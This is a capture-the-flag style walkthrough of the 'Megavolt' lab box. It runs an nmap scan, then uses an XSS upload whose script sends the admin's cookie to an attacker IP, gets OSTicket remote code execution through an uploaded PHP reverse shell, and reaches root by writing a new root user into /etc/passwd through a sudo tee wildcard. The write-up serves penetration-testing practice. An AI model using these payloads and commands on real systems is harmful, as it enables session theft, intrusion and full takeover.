Megavolt
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 3000 -Pn 192.168.183.115
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-12 13:29 +08
Nmap scan report for 192.168.183.115
Host is up (0.17s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
We can start proxying traffic through Burp.
OSTicket -> XSS Admin Cookie
Port 80 hosted an OSTicket instance, which has a lot of vulnerabilities and exploits:

I registered a new user and opened a ticket. When I viewed the status, it seems that an 'Alfred Smith' closes the tickets:

This confirms that a user is indeed viewing the tickets, and we can try to use an XSS exploit for it. The file upload function is vulnerable to an XSS exploit:
We can upload this HTML file to steal the administrator's cookie:
<script>new Image().src='http://192.168.45.208/?cookie=' + encodeURI(document.cookie);</script>
As soon as we upload the file and submit a new ticket, we get this on a listener port:

Using this cookie, we can then login to OSTicket at /scp
by changing our cookie within Burp:

OSTicket RCE
Within the settings of the Admin Panel, we can find the version of OSTicket running:

This version is vulnerable to an RCE exploit. To exploit it, we first need to enable the plugin that stores attachments within the file system of the machine:

Afterwards, in the settings, make sure to change the Attachment settings:

Then, we need to open a new ticket and upload a PHP reverse shell.

View the ticket from the Administrator account:

If we click on the attachment, it would generate a GET request to the file.php
file with a key:

This is the URL key, and we need one more key which is the File key. This can be generated by doing the following:
$ php -a
Interactive shell
php > $sha1 = base64_encode(sha1_file('shell.php', true));
php > print(str_replace(array('=','+','/'), array('','-','_'), $sha1));
Y2_qPxdA2XMAeDyyloBdYykx9uE
Then, we can finally use this repository's script to trigger the shell:
The exploit took me quite a few times before it worked. If it doesn't work, upload your shell with a different name. In my case, shell.php
worked.

The script would brute force every possible directory that the PHP shell is in before executing it:

Privilege Escalation
Sudo Tee + Wildcard -> Root
We can check our sudo
privileges on the machine:
bash-4.2$ sudo -l
Matching Defaults entries for apache on megavolt:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User apache may run the following commands on megavolt:
(ALL) NOPASSWD: /usr/bin/tee /var/log/httpd/*
Because there's a wildcard there, we can basically run tee
to write to any file we want. First, generate a new password hash:
$ openssl passwd -1 hello123
$1$/l2LqOov$SE/j5UXGMIShXVQVjiEjJ.
Then, write this to the /etc/passwd
file using this one-liner:
(cat /etc/passwd && echo 'innocent:$1$/l2LqOov$SE/j5UXGMIShXVQVjiEjJ.:0::/root:/bin/sh') | sudo tee /var/log/httpd/../../../../../../etc/passwd
This would add our new entry into the /etc/passwd
file and we can su
to become root
:

Rooted!
Last updated